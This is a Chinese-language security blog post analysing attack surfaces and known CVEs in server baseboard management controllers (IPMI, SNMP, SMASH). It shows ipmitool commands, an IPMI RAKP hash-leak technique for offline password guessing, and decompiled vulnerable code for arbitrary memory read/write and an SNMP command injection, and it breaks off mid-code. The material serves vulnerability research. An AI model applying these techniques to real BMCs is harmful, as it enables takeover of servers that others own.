
 <!DOCTYPE HTML>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>BMC漏洞实例分析 | p1Kk&#39;s World!</title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="p1Kk">
    

    
    <meta name="description" content="BMC简介BMC（Baseboard Management Controller）为主板管理控制器。它是一种硬件设备或嵌入式系统，通常位于计算机主板上，用于监控、管理和维护计算机系统的硬件和软件。他本质上使用传感器来与设备进行通信，允许对被控机器进行完全控制（例如KVM）。这样可以通过远程访问BMC，然后重新配置主机，更改BIOS设置；或者刷新受控设备的固件。 不同供应商的服务器和主板可能会配备不">
<meta name="keywords" content="BMC">
<meta property="og:type" content="article">
<meta property="og:title" content="BMC漏洞实例分析">
<meta property="og:url" content="p1Kk.github.io/2024/02/10/BMC/bmc/index.html">
<meta property="og:site_name" content="p1Kk&#39;s World!">
<meta property="og:description" content="BMC简介BMC（Baseboard Management Controller）为主板管理控制器。它是一种硬件设备或嵌入式系统，通常位于计算机主板上，用于监控、管理和维护计算机系统的硬件和软件。他本质上使用传感器来与设备进行通信，允许对被控机器进行完全控制（例如KVM）。这样可以通过远程访问BMC，然后重新配置主机，更改BIOS设置；或者刷新受控设备的固件。 不同供应商的服务器和主板可能会配备不">
<meta property="og:locale" content="en">
<meta property="og:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231026110011812.png">
<meta property="og:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231026105932679.png">
<meta property="og:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231026105911034.png">
<meta property="og:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231026110042361.png">
<meta property="og:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231106105054321.png">
<meta property="og:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231108155710506.png">
<meta property="og:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231108183645122.png">
<meta property="og:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231108170420750.png">
<meta property="og:updated_time" content="2024-07-31T10:36:32.722Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="BMC漏洞实例分析">
<meta name="twitter:description" content="BMC简介BMC（Baseboard Management Controller）为主板管理控制器。它是一种硬件设备或嵌入式系统，通常位于计算机主板上，用于监控、管理和维护计算机系统的硬件和软件。他本质上使用传感器来与设备进行通信，允许对被控机器进行完全控制（例如KVM）。这样可以通过远程访问BMC，然后重新配置主机，更改BIOS设置；或者刷新受控设备的固件。 不同供应商的服务器和主板可能会配备不">
<meta name="twitter:image" content="p1Kk.github.io/2024/02/10/BMC/bmc/img%5Cimage-20231026110011812.png">

    
    <link rel="alternative" href="atom.xml" title="p1Kk&#39;s World!" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/site.jpg">
    
    
    <link rel="apple-touch-icon" href="/img/head.png">
    <link rel="apple-touch-icon-precomposed" href="/img/head.png">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      
<div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo2.jpg" alt="p1Kk&#39;s World!" title="p1Kk&#39;s World!"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="p1Kk&#39;s World!">p1Kk&#39;s World!</a></h1>
				<h2 class="blog-motto">艺无止境，功不唐捐。</h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
						<li><a href="/about">About</a></li>
					
						<li><a href="/tags">Tags</a></li>
					
						<li><a href="/categories">Categories</a></li>
					
					<li>
 					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="search" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:p1Kk.github.io">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	
	  <article itemprop="articleBody"> 
		  <header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2024/02/10/BMC/bmc/" title="BMC漏洞实例分析" itemprop="url">BMC漏洞实例分析</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="p1Kk" target="_blank" itemprop="author">p1Kk</a>
		
  <p class="article-time">
    <time datetime="2024-02-09T16:00:00.000Z" itemprop="datePublished"> Published 2024-02-10</time>
    
  </p>
</header>
	  <div class="article-content">
		  
		  <div id="toc" class="toc-article">
			  <strong class="toc-title">Contents</strong>
		  
			  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#BMC简介"><span class="toc-number">1.</span> <span class="toc-text">BMC简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#带外管理"><span class="toc-number">2.</span> <span class="toc-text">带外管理</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#BMC攻击面"><span class="toc-number">3.</span> <span class="toc-text">BMC攻击面</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#SMASH"><span class="toc-number">3.1.</span> <span class="toc-text">SMASH</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SNMP"><span class="toc-number">3.2.</span> <span class="toc-text">SNMP</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IPMI"><span class="toc-number">3.3.</span> <span class="toc-text">IPMI</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2013-4786"><span class="toc-number">3.3.1.</span> <span class="toc-text">CVE-2013-4786</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2023-34344-AMI-amp-CVE-2022-42288-NVIDIA"><span class="toc-number">3.3.2.</span> <span class="toc-text">CVE-2023-34344 - AMI &amp; CVE-2022-42288 - NVIDIA</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2023-34341-AMI-amp-CVE-2022-42278-NVIDIA"><span class="toc-number">3.3.3.</span> <span class="toc-text">CVE-2023-34341 - AMI &amp; CVE-2022-42278 - NVIDIA</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2023-34343-AMI-amp-CVE-2022-42289-NVIDIA"><span class="toc-number">3.3.4.</span> <span class="toc-text">CVE-2023-34343 - AMI &amp; CVE-2022-42289 - NVIDIA</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2023-34334-AMI-amp-CVE-2022-42290-NVIDIA"><span class="toc-number">3.3.5.</span> <span class="toc-text">CVE-2023-34334 - AMI &amp; CVE-2022-42290 - NVIDIA</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2017-8979"><span class="toc-number">3.3.6.</span> <span class="toc-text">CVE-2017-8979</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HTTPS"><span class="toc-number">3.4.</span> <span class="toc-text">HTTPS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2017-12542"><span class="toc-number">3.4.1.</span> <span class="toc-text">CVE-2017-12542</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2018-1207"><span class="toc-number">3.4.2.</span> <span class="toc-text">CVE-2018-1207</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2017-8979-1"><span class="toc-number">3.4.3.</span> <span class="toc-text">CVE-2017-8979</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#BMC-2-HOST"><span class="toc-number">4.</span> <span class="toc-text">BMC 2 HOST</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HOST-2-BMC"><span class="toc-number">5.</span> <span class="toc-text">HOST 2 BMC</span></a></li></ol>
		  
		  </div>
		  
		  <h1 id="BMC简介"><a href="#BMC简介" class="headerlink" title="BMC简介"></a>BMC简介</h1><p>BMC（Baseboard Management Controller）为主板管理控制器。它是一种硬件设备或嵌入式系统，通常位于计算机主板上，用于监控、管理和维护计算机系统的硬件和软件。他本质上使用传感器来与设备进行通信，允许对被控机器进行完全控制（例如KVM）。这样可以通过远程访问BMC，然后重新配置主机，更改BIOS设置；或者刷新受控设备的固件。</p>
<p>不同供应商的服务器和主板可能会配备不同类型的 BMC，例如，HP 的 iLO、Dell 的 iDRAC、浪潮的IPMI、华为的MGMT 等都是 BMC 的具体实现。</p>
<p><img src="img%5Cimage-20231026110011812.png" alt="HP iLO"></p>
<p><img src="img%5Cimage-20231026105932679.png" alt="DELL iDRAC"></p>
<p><img src="img%5Cimage-20231026105911034.png" alt="浪潮 IPMI"></p>
<p><img src="img%5Cimage-20231026110042361.png" alt="华为 MGMT"></p>
<p>BMC通常被实现为嵌入式ARM系统，芯片外围会配置自己的RAM、Flash等器件，插电BMC就会快速运行起来。</p>
<p>BMC是一个独立的系统，不依赖与系统上的其他硬件（比如CPU、内存等等），也不依赖BIOS、OS等。但BMC可以与BIOS和OS交互，一般大规模的数据中心会有OS系统管理软件与BMC协同工作实现集中管理的工作。</p>
<h1 id="带外管理"><a href="#带外管理" class="headerlink" title="带外管理"></a>带外管理</h1><p>服务器的带外管理是指远程客户端通过网络物理通道对服务器进行控制管理和维护。常见的带外管理接口有 IPMI 和 Redfish：</p>
<ul>
<li><p>IPMI（Intelligent Platform Management Interface）是一种用于管理和监控服务器硬件的标准接口，定义了用于通过本地总线和网络进行通信的通信协议。IPMI接口提供了一组命令和响应，可以通过网络远程访问服务器。IPMI接口可以通过命令行工具（ipmitool）、图形界面或API进行访问。（IPMI在 2015 年公布 2.0 v1.1标准后，停止更新维护，被 RedFish 永久代替。为了做到兼容，现在不少服务器上仍然支持 IPMI。）它的核心部件为BMC</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># 查看设备信息</span><br><span class="line">ipmitool -I lanplus -H 10.88.1.181 -U sysadmin -P admin chassis status</span><br><span class="line"># 查看用户</span><br><span class="line">ipmitool -I lanplus -H 10.88.1.181 -U sysadmin -P admin user list</span><br><span class="line"># 服务器的开机，关机</span><br><span class="line">ipmitool -I lanplus -H 10.88.1.181 -U sysadmin -P admin power on</span><br><span class="line">ipmitool -I lanplus -H 10.88.1.181 -U sysadmin -P admin power off</span><br><span class="line"># 查看BMC的信息</span><br><span class="line">ipmitool -I lanplus -H 10.88.1.181 -U sysadmin -P admin mc info</span><br></pre></td></tr></table></figure>
</li>
<li><p>Redfish 是一种基于 HTTPs 服务的管理标准，利用 RESTful 接口实现设备管理。RESTful API接口可以使用任何支持HTTP协议的客户端进行访问，如浏览器、命令行工具或编程语言。以下是使用Python访问RESTful API接口获取服务器信息的示例代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">bmc_ip = <span class="string">"your_bmc_ip"</span></span><br><span class="line">username = <span class="string">"your_username"</span></span><br><span class="line">password = <span class="string">"your_password"</span></span><br><span class="line"></span><br><span class="line">url = <span class="string">f"https://<span class="subst">&#123;bmc_ip&#125;</span>/redfish/v1/Systems/System.Embedded.1"</span></span><br><span class="line">response = requests.get(url, auth=(username, password), verify=<span class="literal">False</span>)</span><br><span class="line"><span class="keyword">if</span> response.status_code == <span class="number">200</span>:</span><br><span class="line">    data = response.json()</span><br><span class="line">    print(<span class="string">"Server Name: "</span>, data[<span class="string">"Name"</span>])</span><br><span class="line">    print(<span class="string">"Manufacturer: "</span>, data[<span class="string">"Manufacturer"</span>])</span><br><span class="line">    print(<span class="string">"Model: "</span>, data[<span class="string">"Model"</span>])</span><br><span class="line">    print(<span class="string">"Serial Number: "</span>, data[<span class="string">"SerialNumber"</span>])</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	print(<span class="string">"Error accessing BMC API"</span>)</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h1 id="BMC攻击面"><a href="#BMC攻击面" class="headerlink" title="BMC攻击面"></a>BMC攻击面</h1><table>
<thead>
<tr>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>SMASH</td>
<td>UDP</td>
<td>161, 162</td>
</tr>
<tr>
<td>SNMP</td>
<td>TCP</td>
<td>22</td>
</tr>
<tr>
<td>HTTPS</td>
<td>TCP</td>
<td>80, 443</td>
</tr>
<tr>
<td>IPMI</td>
<td>UDP</td>
<td>623</td>
</tr>
<tr>
<td>Standalone WSMAN/KVM/VNC</td>
<td></td>
<td></td>
</tr>
</tbody></table>
<h2 id="SMASH"><a href="#SMASH" class="headerlink" title="SMASH"></a>SMASH</h2><ul>
<li><p>DTMF标准化的命令行</p>
</li>
<li><p>通过SSH运行</p>
</li>
<li><p>大多数攻击面都是认证后的</p>
</li>
</ul>
<p>可通过一些产品的默认账号密码登录</p>
<p><img src="img%5Cimage-20231106105054321.png" alt="image-20231106105054321"></p>
<h2 id="SNMP"><a href="#SNMP" class="headerlink" title="SNMP"></a>SNMP</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ snmpwalk -v1 -c public -m &quot;./immalert.mib&quot; 192.168.1.129</span><br><span class="line">	|		|		|				|				|		</span><br><span class="line">	|		|		|				|				|------&gt; 目标IP</span><br><span class="line">	|		|		|				|------&gt; 指定MIB文件，包含了用于解释和查询SNMP数据的信息</span><br><span class="line">	|		|		|------&gt; community字符public，用于只读访问</span><br><span class="line">	|		|------&gt; SNMP版本v1</span><br><span class="line">	|------&gt; 执行SNMP Walk操作，从设备上获取关于其管理信息的数据</span><br></pre></td></tr></table></figure>

<p>返回一些管理数据或命令，或许可以找到一些可控的命令注入</p>
<h2 id="IPMI"><a href="#IPMI" class="headerlink" title="IPMI"></a>IPMI</h2><ul>
<li>BMC相关协议</li>
<li>用于远程管理BMC和访问大部分功能</li>
<li>包括UDP串行控制台</li>
</ul>
<p>历史问题：</p>
<ul>
<li><p>Cipher Zero认证绕过</p>
</li>
<li><p>RAKP认证崩溃</p>
</li>
<li><p>弱Session ID</p>
</li>
</ul>
<h3 id="CVE-2013-4786"><a href="#CVE-2013-4786" class="headerlink" title="CVE-2013-4786"></a>CVE-2013-4786</h3><p>分析BMC可以首先检查自2013以来就已知的哈希泄露</p>
<p>下图是IPMI标准手册截图，解释了IPMI中身份验证如何工作。IPMI 2.0规范使用RAKP认证密钥交换协议。</p>
<p>可以看到两条消息，<strong>Message 1</strong>从管理员控制台发送到BMC，管理员只需要将用户名发送到BMC，而BMC会查找用户名并根据包含用户名的某些数据（比如控制台和受管系统的Session ID，和对应的随机数，权限级别，用户名长度和用户名本身）计算HMAC，且即将进行身份验证的用户的密码将用作此HMAC计算的密钥。<strong>Message 2</strong>将这个HMAC计算结果被发送回管理员。</p>
<p><img src="img%5Cimage-20231108155710506.png" alt="image-20231108155710506"></p>
<p>触发RAKP的一种简单方法是使用<code>ipmitool</code> </p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ ipmitool -I lanplus -v -v -v -U ADMIN -P fluffy-wuffy -H 10.0.0.1 chassis identify</span><br><span class="line">				|		  |			|			|			  |				|------&gt; 蓝色uid指示灯，直接执行命令，只能维持15秒</span><br><span class="line">                |		  |			|			|			  |------&gt; 指定目标BMC设备的IP地址</span><br><span class="line">				|		  |			|			|------&gt; 无效的密码，不重要，因为不需要完成认证</span><br><span class="line">				|		  |			|------&gt; 用户名</span><br><span class="line">				|		  |------&gt; -v*3 启用详细的调试输出，得到所有传入和传出的数据包</span><br><span class="line">				|</span><br><span class="line">				|------&gt; IPMI接口类型LANplus</span><br></pre></td></tr></table></figure>

<p>返回消息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">Message 1：</span><br><span class="line">   [...]</span><br><span class="line">   rakp2 mac input buffer (63 bytes)</span><br><span class="line">   a4 a3 a2 a0 4c 7f fb df ee a4 a3 96 b1 d0 7e 27</span><br><span class="line">   cd ef 32 ae 66 cf 87 b9 aa 3e 97 ed 5d 39 77 4b</span><br><span class="line">   bc 8a c5 a9 e2 da 1d d9 35 30 30 31 4d 53 00 00</span><br><span class="line">   00 00 00 00 00 00 00 00 14 05 41 44 4d 49 4e</span><br><span class="line">   							   | |-------------|</span><br><span class="line">   							   |		 |</span><br><span class="line">   							   |		 |------&gt; 用户名ADMIN</span><br><span class="line">   							   |------&gt; 用户名长度</span><br><span class="line">   [...]</span><br><span class="line">Message 2：</span><br><span class="line">   [...]</span><br><span class="line">   Key exchange auth code [sha1] : 0xede8ec3caeb235dbad1210ef985b1b19cdb40496</span><br><span class="line">   [...]</span><br><span class="line">   /</span><br><span class="line">   ...unauthorized name</span><br><span class="line">   /</span><br><span class="line">   ...</span><br></pre></td></tr></table></figure>

<p>因此，如果攻击者知道BMC用户数据库中存在的正确的用户名，他就可以接收哈希值并计算它，并且将 猜测密码 用作此HMAC的密钥，计算出HMAC并与Message 2中的HMAC进行对比，一致则密码正确。</p>
<p>所以到现在2023年已经修复了吗？并没有，但一些厂商会有防护措施，比如通过防火墙设置策略、强密码或禁用IPMI解决。</p>
<h3 id="CVE-2023-34344-AMI-amp-CVE-2022-42288-NVIDIA"><a href="#CVE-2023-34344-AMI-amp-CVE-2022-42288-NVIDIA" class="headerlink" title="CVE-2023-34344 - AMI &amp; CVE-2022-42288 - NVIDIA"></a>CVE-2023-34344 - AMI &amp; CVE-2022-42288 - NVIDIA</h3><p>如果不知道正确的用户名呢？</p>
<p>侧信道：当BMC进行身份验证时，用户名的长度也会在同一消息中发送。可以猜测BMC对用户名的检测使用的是memcpy，那么服务器处理这个用户名的时间不是固定的，也就是通过侧信道爆破用户名</p>
<h3 id="CVE-2023-34341-AMI-amp-CVE-2022-42278-NVIDIA"><a href="#CVE-2023-34341-AMI-amp-CVE-2022-42278-NVIDIA" class="headerlink" title="CVE-2023-34341 - AMI &amp; CVE-2022-42278 - NVIDIA"></a>CVE-2023-34341 - AMI &amp; CVE-2022-42278 - NVIDIA</h3><p>IPMI服务器监听BMC套接字，特定的读写API允许读取服务器进程上下文中的任何虚拟内存，并返回客户端</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>...										<span class="comment">// if ( ActivateFlashStatus != 1 )</span></span><br><span class="line"><span class="keyword">if</span>...										<span class="comment">// if ( CalculateChksum( &amp;req-&gt;address, req-&gt;hdr.struct_length) != req- &gt;hdr.crc32</span></span><br><span class="line"><span class="keyword">if</span>...										<span class="comment">// if ( req-&gt;hdr.struct_length != 7 )</span></span><br><span class="line">size = LOBYTE(req-&gt;size) | (HIBYTE(req-&gt;size) &lt;&lt; <span class="number">8</span>);</span><br><span class="line">address = ( LOBYTE(req-&gt;address) | (BYTE1(req-&gt;address) &lt;&lt; <span class="number">8</span>) | ( BYTE2(req-&gt;address) &lt;&lt; <span class="number">16</span>) | (HIBYTE(req-&gt;address) &lt;&lt; <span class="number">24</span>)); </span><br><span class="line">heap_ mem = <span class="built_in">malloc</span>(size);</span><br><span class="line"><span class="keyword">if</span>...										<span class="comment">// if ( !heap_ mem )</span></span><br><span class="line"><span class="built_in">memcpy</span>(heap_mem, address, size);</span><br><span class="line"><span class="built_in">memcpy</span>(&amp;res[<span class="number">1</span>], heap_mem, size);			<span class="comment">// [1] Read</span></span><br><span class="line">res-&gt;status = <span class="number">0</span>;</span><br><span class="line">LastStatCode = <span class="number">0</span>;</span><br><span class="line">v15 = req-&gt;hdr.field_0</span><br><span class="line">v16 = (LOBYTE(req-&gt;hdr.field_0)</span><br><span class="line">(BYTE1(req-&gt;hdr.field_0) &lt;&lt; <span class="number">8</span>) | (BYTE2(req-&gt;hdr.field_0) &lt;&lt; <span class="number">16</span>) | (HIBYTE(req-&gt;hdr.field_0) &lt;&lt; <span class="number">24</span></span><br><span class="line">v17 = (LOBYTE(req-&gt;hdr.field_0) | (BYTE1(req-&gt;hdr.field_0) &lt;&lt; <span class="number">8</span>) | (BYTE2(req-&gt;hdr.field_0) &lt;&lt; <span class="number">16</span>) | (HIBYTE(req-&gt;hdr. field_0) &lt;&lt; <span class="number">24</span></span><br><span class="line">BYTE1(res-&gt;hdr.field_ <span class="number">0</span>) = BYTE1(req-&gt;hdr.field_ <span class="number">0</span>);</span><br><span class="line">LOBYTE(res-&gt;hdr.field_ <span class="number">0</span>) = v15;</span><br><span class="line">BYTE2(res-&gt;hdr.field_ <span class="number">0</span>) = v16;</span><br><span class="line">HIBYTE(res-&gt;hdr.field_ <span class="number">0</span>) = v17;</span><br><span class="line">res- &gt;hdr.struct_length - LOBYTE(req-&gt;size) | (HIBYTE(req-&gt;size) &lt;&lt; <span class="number">8</span>);</span><br><span class="line">res-&gt;hdr.crc32 = CalculateChksum(heap_ mem, LOBYTE(req-&gt;size)| (HIBYTE(req-&gt;size) &lt;&lt; <span class="number">8</span>));</span><br><span class="line"><span class="built_in">free</span>(heap_mem);</span><br><span class="line"><span class="keyword">return</span> (LOBYTE(req-&gt;size) | (HIBYTE(req-&gt;size) &lt;&lt; <span class="number">8</span>)) + <span class="number">13</span>;</span><br></pre></td></tr></table></figure>

<p>同理，没有对地址和内容做校验，会将请求包内容写入任意地址</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( gDeviceNode &lt;= <span class="number">1</span> )</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> ( ActivateFlashStatus == <span class="number">1</span> )</span><br><span class="line">        <span class="keyword">if</span> (CalculateChksum(&amp;req-&gt;address, LOBYTE(req-&gt;hdr.struct_length) | (HIBYTE(req-&gt;hdr.struct_length) &lt;&lt; <span class="number">8</span>)) == (LOBYTE(...)))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">memcpy</span>(</span><br><span class="line">            (LOBYTE(req-&gt;address)| (BYTE1(req-&gt;address) &lt;&lt; <span class="number">8</span>) | (BYTE2(req-&gt;address) &lt;&lt; <span class="number">16</span>) | (HIBYTE(req-&gt;address) &lt;&lt; <span class="number">24</span>)),</span><br><span class="line">            &amp;req[<span class="number">1</span>],</span><br><span class="line">            (LOBYTE(req-&gt;hdr.struct_length) | (HIBYTE(req-&gt;hdr.struct_length) &lt;&lt; <span class="number">8</span>)) - <span class="number">5</span>);			<span class="comment">// [1] Write</span></span><br><span class="line">			...</span><br></pre></td></tr></table></figure>

<h3 id="CVE-2023-34343-AMI-amp-CVE-2022-42289-NVIDIA"><a href="#CVE-2023-34343-AMI-amp-CVE-2022-42289-NVIDIA" class="headerlink" title="CVE-2023-34343 - AMI &amp; CVE-2022-42289 - NVIDIA"></a>CVE-2023-34343 - AMI &amp; CVE-2022-42289 - NVIDIA</h3><p>SNMP Injection<br>IPMI每次发送想要重新加载或更改SNMP配置新包时，都会使用system创建一个新文件，而rocommunity是从用户请求中读取的，然后直接被拼接到command并system执行，可以实现注入</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="number">4</span>:									<span class="comment">// req[0]</span></span><br><span class="line">    *rwcommunity = *zeroes;</span><br><span class="line">    *&amp;rwcommunity[<span class="number">4</span>] = *&amp;zeroes[<span class="number">4</span>];</span><br><span class="line">    *&amp;rwcommunity[<span class="number">8</span>] = *&amp;zeroes[<span class="number">8</span>];</span><br><span class="line">    *&amp;rwcommunity[<span class="number">12</span>] = *&amp;zeroes[<span class="number">12</span>]; </span><br><span class="line">    req_len_decr = req_len - <span class="number">1</span>;</span><br><span class="line">    *&amp;rwcommunity[<span class="number">16</span>] = *&amp;zeroes[<span class="number">16</span>];</span><br><span class="line">    rwcommunity[<span class="number">20</span>] = zeroes[<span class="number">20</span>];</span><br><span class="line">    <span class="built_in">memcpy</span>(aPublic, req + <span class="number">1</span>, req_len_decr);</span><br><span class="line">    <span class="built_in">memcpy</span> (rocommunity, req + <span class="number">1</span>, req_len_decr);				<span class="comment">// [1]</span></span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">memset</span>(cmd, <span class="number">0</span>, <span class="keyword">sizeof</span>(cmd));</span><br><span class="line"><span class="built_in">sprintf</span>(cmd, <span class="string">"echo'#SNMP User Configuration' &gt; %s"</span>, <span class="string">"/conf/snmp_users.conf"</span>);</span><br><span class="line">system( cmd);</span><br><span class="line"><span class="built_in">memset</span>(cmd, <span class="number">0</span>, <span class="keyword">sizeof</span>(cmd));</span><br><span class="line"><span class="built_in">sprintf</span>(cmd, <span class="string">"echo 'rwcommunity %s' &gt;&gt;%s"</span>， rwcommunity, <span class="string">"/conf/snmp_users.conf"</span>);</span><br><span class="line">system( cmd);</span><br><span class="line"><span class="built_in">memset</span>(cmd, <span class="number">0</span>, <span class="keyword">sizeof</span>(cmd));</span><br><span class="line"><span class="built_in">sprintf</span>(cmd, <span class="string">"echo 'rocommunity %s' &gt;&gt;%s"</span>, rocommunity, <span class="string">"/conf/snmp_users.conf"</span>);				<span class="comment">// [2]</span></span><br><span class="line">system( cmd);</span><br><span class="line"><span class="built_in">memset</span>(cmd, <span class="number">0</span>, <span class="keyword">sizeof</span>(cmd));</span><br><span class="line"><span class="built_in">sprintf</span>(cmd, <span class="string">"echo 'rwcommunity6 %s' &gt;&gt;%s"</span>, rwcommunity, <span class="string">"/conf/snmp_users.conf"</span>);</span><br><span class="line">system( cmd);</span><br><span class="line"><span class="built_in">memset</span>(cmd, <span class="number">0</span>, <span class="keyword">sizeof</span>(cmd));</span><br><span class="line"><span class="built_in">sprintf</span>(cmd, <span class="string">"echo 'rocommunity6 %s' &gt;&gt;%s "</span> , rocommunity, <span class="string">"/conf/snmp_users.conf"</span>);			<span class="comment">// [2]</span></span><br><span class="line">system( cmd);</span><br><span class="line"><span class="built_in">memset</span>(cmd, <span class="number">0</span>, <span class="keyword">sizeof</span>(cmd));</span><br><span class="line"><span class="built_in">sprintf</span>(cmd, <span class="string">"echo 'dlmod libsnmp_hostname_mib /usr/1ocal/lib/libsnmp_hostname_mib.so' &gt;&gt;%s"</span>， <span class="string">"/conf/snmp_users.conf"</span>);</span><br><span class="line">system( cmd);</span><br><span class="line"><span class="built_in">memset</span>(cmd, <span class="number">0</span>, <span class="keyword">sizeof</span>(cmd));</span><br><span class="line"><span class="built_in">sprintf</span>(cmd, <span class="string">"echo 'dlmod libsnmp_systemstatus /usr/local/lib/libsnmp_systemstatus.so' &gt;&gt;%s"</span>，<span class="string">"/conf/snmp_users.conf"</span>);</span><br><span class="line">system( cmd);</span><br><span class="line"><span 